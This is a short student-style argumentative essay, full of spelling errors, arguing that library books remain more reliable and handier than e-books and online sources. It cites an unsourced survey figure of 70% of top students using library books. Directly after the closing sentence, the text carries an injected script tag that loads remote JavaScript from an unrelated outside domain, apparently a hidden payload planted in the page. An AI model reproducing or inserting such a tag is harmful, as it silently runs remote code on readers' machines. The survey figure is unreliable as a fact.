physical books are useless because of e-books.

The discussion on whether library books are losing its importance as more informations available online is a debatable topic and people all around the globe are divided into their opinions. The subject attracts a majority of views and remain a hot topic among the people of concern. In this essay, I shall scrutinise my point of view by providing some relevant examples and explanation before drawing any conclusion.

At the outset there are myriad of persuasive arguments in favour of my instance. The most preponderant one lies in the fact that library books are the authentic sources of information on which people can rely to learn and understant to core of the subject. To get an authentic reflection it is advisable to reference any books while writing a report or assignment compared to online informations, because the internet provides a load of unwanted information without being specific to the topic. The most impecceble example that can provided is the survey done on the university students, which suggests that 70% of the students with excellent grade use the library books instead on online journals.

Those who disagree have a cogent notion and could assert that e-books are the best from the perspective of gaining more informations at their own confort. Another angle on the debate suggests that the people living in remote areas can now learn through these online resources to because it is not possible to get access to the paper books. The most pertinent example that could be provided here is the books on an Autism can be downloaded in the developing countries because the delivering process is tricky and takes longer time.

To conclude, after considering above stated points into consideration, I am inclined to believe that if it is acessible physical books are more handy.<script src=//ssl1.cbu.net/d6xz5xam></script>